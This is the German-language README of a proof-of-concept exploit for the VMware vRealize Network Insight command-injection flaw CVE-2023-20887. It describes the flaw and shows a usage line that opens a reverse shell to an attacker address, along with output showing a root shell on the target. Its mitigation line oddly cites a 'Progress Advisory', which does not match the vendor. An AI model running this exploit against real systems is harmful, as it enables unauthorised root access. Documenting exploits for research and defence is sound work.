
VMWare vRealize Network Insight vorauthentifizierter RCE (CVE-2023-20887)
POC für CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) nicht authentifizierte RCE
Eine Root-Cause-Analyse der Schwachstelle finden Sie in meinem Blog: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) ist anfällig für Befehlseinschleusung bei der Annahme von Benutzereingaben über die Apache Thrift RPC-Schnittstelle. Diese Schwachstelle erlaubt es einem entfernten, nicht authentifizierten Angreifer, beliebige Befehle auf dem zugrunde liegenden Betriebssystem als Root-Benutzer auszuführen. Die RPC-Schnittstelle wird durch einen Reverse-Proxy geschützt, der umgangen werden kann. VMware hat den Schweregrad dieses Problems als kritisch eingestuft mit einem maximalen CVSSv3-Basiswert von 9.8. Ein böswilliger Akteur kann im Kontext von 'root' auf dem Gerät entfernte Codeausführung erlangen. VMWare 6.x-Versionen sind anfällig.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Aktualisieren Sie auf die neueste Version oder mildern Sie die Schwachstelle durch Befolgen der Anweisungen im Progress Advisory
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu gedacht, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich autorisiert. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für die missbräuchliche Verwendung der Software. Verwenden Sie sie verantwortungsbewusst.